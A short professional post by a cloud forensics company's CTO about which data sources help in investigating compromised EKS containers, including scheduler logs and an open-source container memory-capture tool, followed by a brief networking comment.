Container DFIR Data Sources
Christopher Doman
Co-Founder/CTO at Cado Security - Cloud Forensics & Incident Response
In response to a question on data sources in EKS investigations -
Scheduler & Controller logs in S3
Here’s an EKS scenario where we’ve collected and parsed out the scheduler etc. logs
There’s not much in those logs for that particular scenario, but it’s useful to review them side by side with what’s happening inside the container:
Al and Paul did an analysis for that compromise of what you see in each data-source:
Generally the most useful data in the scenarios we’ve tested out has been inside the container, but the approach we’re taking is “collect everything whilst it’s still there, then see what you can get out of it”.
The hardest bit is merging all data-sources together and presenting the output side by side in a useful way:
Memory Analysis of Containers
We’ve open-sourced most of how we do memory in containers now - the code and some example output are at https://github.com/cado-security/varc .
It’s pretty fun to e.g. dump xmrig and see the config files running in memory, and avoids the need to build memory profiles on potentially malicious infrastructure:
We assist companies to go global, find relevant business partners & manage new global business opportunities.
2 年Hi?Christopher, It's very interesting! I will be happy to connect.